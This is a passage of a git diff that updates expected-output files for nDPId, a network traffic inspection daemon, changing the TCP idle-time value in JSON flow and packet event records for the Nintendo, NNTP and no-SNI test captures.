00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1500731323269,"flow_last_seen":1500731323270,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":52119,"dst_port":33335,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326270,"flow_last_seen":1500731326270,"flow_idle_time":180000,"flow_min_l4_payload_len":688,"flow_max_l4_payload_len":688,"flow_tot_l4_payload_len":688,"flow_avg_l4_payload_len":688,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"52.10.205.177","src_port":52119,"dst_port":34343,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326270,"flow_last_seen":1500731326270,"flow_idle_time":180000,"flow_min_l4_payload_len":688,"flow_max_l4_payload_len":688,"flow_tot_l4_payload_len":688,"flow_avg_l4_payload_len":688,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"52.10.205.177","src_port":52119,"dst_port":34343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1500731326644,"flow_last_seen":1500731327201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"}} -00820{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1500731341201,"flow_last_seen":1500731341710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":6363,"flow_avg_l4_payload_len":318,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"}} +00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1500731326644,"flow_last_seen":1500731327201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"}} +00820{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1500731341201,"flow_last_seen":1500731341710,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":6363,"flow_avg_l4_payload_len":318,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"}} 00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":447,"flow_first_seen":1500731342849,"flow_last_seen":1500731348749,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":844,"flow_tot_l4_payload_len":168900,"flow_avg_l4_payload_len":377,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"185.118.169.65","src_port":55915,"dst_port":27520,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1500731320644,"flow_last_seen":1500731325506,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":812,"flow_tot_l4_payload_len":4452,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"91.8.243.35","src_port":52119,"dst_port":49432,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1500731320774,"flow_last_seen":1500731322059,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"109.21.255.11","src_port":52119,"dst_port":50251,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} diff --git a/test/results/nntp.pcap.out b/test/results/nntp.pcap.out index bfe0c6847..16fa8af72 100644 --- a/test/results/nntp.pcap.out +++ b/test/results/nntp.pcap.out @@ -1,11 +1,11 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"nntp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"nntp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1258844926423} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1258844926423,"flow_last_seen":1258844926423,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1258844926423,"l3_proto":"ip4","src_ip":"192.168.190.20","dst_ip":"192.168.190.5","src_port":55630,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1258844926423,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1258844926423,"pkt":"AEBj1fcCABQqM3R+CABFAAA8fZdAAEAGv7nAqL4UwKi+BdlOAHfZ0lWUAAAAAKACFtABzgAAAgQFtAQCCAoAyCgDAAAAAAEDAwY="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1258844926423,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1258844926423,"pkt":"ABQqM3R+AEBj1fcCCABFAAA8AABAAEAGPVHAqL4FwKi+FAB32U6dVo1l2dJVlaASFqBxAwAAAgQFtAQCCAoKz1tgAMgoAwEDAwQ="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1258844926423,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1258844926423,"pkt":"AEBj1fcCABQqM3R+CABFAAA0fZhAAEAGv8DAqL4UwKi+BdlOAHfZ0lWVnVaNZoAQAFy2EAAAAQEICgDIKAMKz1tg"} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1258844926423,"flow_last_seen":1258844926441,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1258844926441,"l3_proto":"ip4","src_ip":"192.168.190.20","dst_ip":"192.168.190.5","src_port":55630,"dst_port":119,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Usenet","breed":"Acceptable","category":"Web"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1258844926423,"flow_last_seen":1258844993785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4921,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1258844993785,"l3_proto":"ip4","src_ip":"192.168.190.20","dst_ip":"192.168.190.5","src_port":55630,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Usenet","breed":"Acceptable","category":"Web"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1258844926423,"flow_last_seen":1258844926423,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1258844926423,"l3_proto":"ip4","src_ip":"192.168.190.20","dst_ip":"192.168.190.5","src_port":55630,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1258844926423,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1258844926423,"pkt":"AEBj1fcCABQqM3R+CABFAAA8fZdAAEAGv7nAqL4UwKi+BdlOAHfZ0lWUAAAAAKACFtABzgAAAgQFtAQCCAoAyCgDAAAAAAEDAwY="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1258844926423,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1258844926423,"pkt":"ABQqM3R+AEBj1fcCCABFAAA8AABAAEAGPVHAqL4FwKi+FAB32U6dVo1l2dJVlaASFqBxAwAAAgQFtAQCCAoKz1tgAMgoAwEDAwQ="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1258844926423,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1258844926423,"pkt":"AEBj1fcCABQqM3R+CABFAAA0fZhAAEAGv8DAqL4UwKi+BdlOAHfZ0lWVnVaNZoAQAFy2EAAAAQEICgDIKAMKz1tg"} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1258844926423,"flow_last_seen":1258844926441,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1258844926441,"l3_proto":"ip4","src_ip":"192.168.190.20","dst_ip":"192.168.190.5","src_port":55630,"dst_port":119,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Usenet","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"nntp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1258844926423,"flow_last_seen":1258844993785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4921,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1258844993785,"l3_proto":"ip4","src_ip":"192.168.190.20","dst_ip":"192.168.190.5","src_port":55630,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Usenet","breed":"Acceptable","category":"Web"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":32,"source":"nntp.pcap","alias":"nDPId-test","packets-captured":32,"packets-processed":32,"total-skipped-flows":0,"total-l4-data-len":4921,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1258844993785} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 32/32 diff --git a/test/results/no_sni.pcap.out b/test/results/no_sni.pcap.out index acc28618c..0b9a5994e 100644 --- a/test/results/no_sni.pcap.out +++ b/test/results/no_sni.pcap.out @@ -1,60 +1,60 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"no_sni.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"no_sni.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1604822444474} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822444474,"flow_last_seen":1604822444474,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1604822444474,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51331,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1604822444474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1604822444474,"pkt":"EBMxuRBeeDHBvV4kCABFAABPAABAAEAGFoDAqAF3aBD5+ciDAbvkc0fPNh\/971AYEABWfwAAFwMDACKpSo7n5l1NtXHPvYJ17DEID+iXo6vcSBPbb4QBvLt6N\/RR"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1604822444475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822444475,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGFo\/AqAF3aBD5+ciDAbvkc0f2Nh\/971AYEAB\/fAAAFwMDABPsQXLhLYpNcnxO3uEm2chWzCNj"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1604822444475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822444475,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGFqfAqAF3aBD5+ciDAbvkc0gONh\/971AREABQ2gAA"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822444486,"flow_last_seen":1604822444486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822444486,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1604822444486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822444486,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGFo\/AqAF3aBD5+cmWAbsdU0ZpAAAAALAC\/\/\/IBQAAAgQFtAEDAwYBAQgKKlLxbAAAAAAEAgAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1604822444624,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822444624,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADkGHZtoEPn5wKgBdwG7yZbnV+zfHVNGaoAS\/\/9HygAAAgQFeAEBBAIBAwMK"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1604822444624,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822444624,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGFqfAqAF3aBD5+cmWAbsdU0Zq51fs4FAQEAB4YwAA"} -00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822444486,"flow_last_seen":1604822444629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":616,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":154,"midstream":0,"thread_ts_msec":1604822444629,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"f14ec85ee5580a29f6523e24e5d3d527","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1604822444486,"flow_last_seen":1604822444807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":682,"flow_tot_l4_payload_len":1474,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1604822444807,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"f14ec85ee5580a29f6523e24e5d3d527","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822444913,"flow_last_seen":1604822444913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604822444913,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1604822444913,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1604822444913,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGlCjAqAF3aBB8YMmcAbs\/DuN6AAAAALAC\/\/+FPgAAAgQFtAEDAwYBAQgKKlLy+gAAAAAEAgAA"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1604822445034,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1604822445034,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADkGmzRoEHxgwKgBdwG7yZyEa\/jPPw7je4AS\/\/9djQAAAgQFeAEBBAIBAwMK"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1604822445034,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1604822445034,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGlEDAqAF3aBB8YMmcAbs\/DuN7hGv40FAQEACOJgAA"} -00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822444913,"flow_last_seen":1604822445039,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":947,"flow_tot_l4_payload_len":947,"flow_avg_l4_payload_len":236,"midstream":0,"thread_ts_msec":1604822445039,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"76ec527d45e3a2a9093484446d7d3264","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":47,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822444913,"flow_last_seen":1604822445135,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":947,"flow_tot_l4_payload_len":1179,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1604822445135,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"76ec527d45e3a2a9093484446d7d3264","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 